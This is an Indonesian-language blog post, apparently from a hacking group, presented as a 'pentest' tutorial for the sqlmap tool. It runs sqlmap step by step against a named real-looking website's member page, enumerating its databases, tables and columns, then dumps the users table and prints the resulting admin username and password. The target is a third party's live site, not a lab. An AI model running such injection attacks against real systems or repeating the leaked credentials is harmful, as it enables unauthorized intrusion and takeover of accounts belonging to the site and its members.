†Vhe-tAx†_*Crew*_†OrGaNizeR† : Tutorial Pentest With SQLMap

Tutorial Pentest With SQLMap: [Image: 9jfuy9.png]

Tools Yang diperlukan :
- SQLMAP = Otw Gogel :haha
- Python = http://www.python.org/download/
Tutorial :
- Buka Sqlmap nya. dengan Command/CMD atau Terminal
- Masukan

Quote:[Directory anda menyimpan]\sqlmap.py -u http://www.bayareaassn.com/memberinfo.php?id=10 –dbs

Image has been scaled down 12% (600×303). Click this bar to view original image (676×341). Click image to open in new window.

, Lalu ente
- Tunggu Sampai Scan Selesai

Quote:available databases [2]:
[*] bayar10_bayareaassn
[*] information_schema

Image has been scaled down 12% (600×303). Click this bar to view original image (676×341). Click image to open in new window.

Yang Berwarna Merah itu adalah Nama Databasenya
- Sekarang Masukan lagi
[Directory anda menyimpan]\sqlmap.py -u http://www.bayareaassn.com/memberinfo.php?id=10 -D bayar10_bayareaassn –tables

Image has been scaled down 12% (600×302). Click this bar to view original image (676×340). Click image to open in new window.

Tunggu Sampai scan selesai
- Nanti Akan Muncul Tables

Quote:+————————–+
| areas |
| categories |
| featured |
| fields |
| jobfields |
| member_areas |
| member_categories |
| member_fields |
| members |
| projects |
| users |
+————————–+

Image has been scaled down 12% (600×301). Click this bar to view original image (675×338). Click image to open in new window.

Lalu Kita Pilih Tables users
- Masukan

Quote:[Directory anda menyimpan]\sqlmap.py -u http://www.bayareaassn.com/memberinfo.php?id=10 -D bayar10_bayareaassn -T users –columns

Dan tunggu sampai scan selesai

Quote:[3 columns]
+———-+————–+
| Column | Type |
+———-+————–+
| id | int(255) |
| password | varchar(255) |
| username | varchar(255) |
+———-+————–+

Image has been scaled down 12% (600×304). Click this bar to view original image (675×341). Click image to open in new window.

- Sekarang tinggal kita Dump
Username :

Quote:\sqlmap.py -u http://www.bayareaassn.com/memberinfo.php?id=10 -D bayar10_bayareaassn -T users -C username –dump

Password :

Quote:\sqlmap.py -u http://www.bayareaassn.com/memberinfo.php?id=10 -D bayar10_bayareaassn -T users -C password –dump

Hasil :

Image has been scaled down 11% (600×300). Click this bar to view original image (672×336). Click image to open in new window.

Username : admin
Password : a11enn0wSekian tutorial dari Saya

By IVO SAFARI

Email atau Vhe-tAx	Kata Sandi Vhe-tAx

Biarkan Sya MsUk Di Vhe-tAx	Lupa kata sandi Anda?

†Vhe-tAx†_Crew_†OrGaNizeR†

Selasa, 11 September 2012

Tutorial Pentest With SQLMap

Tidak ada komentar:

Posting Komentar

Followers

Facebook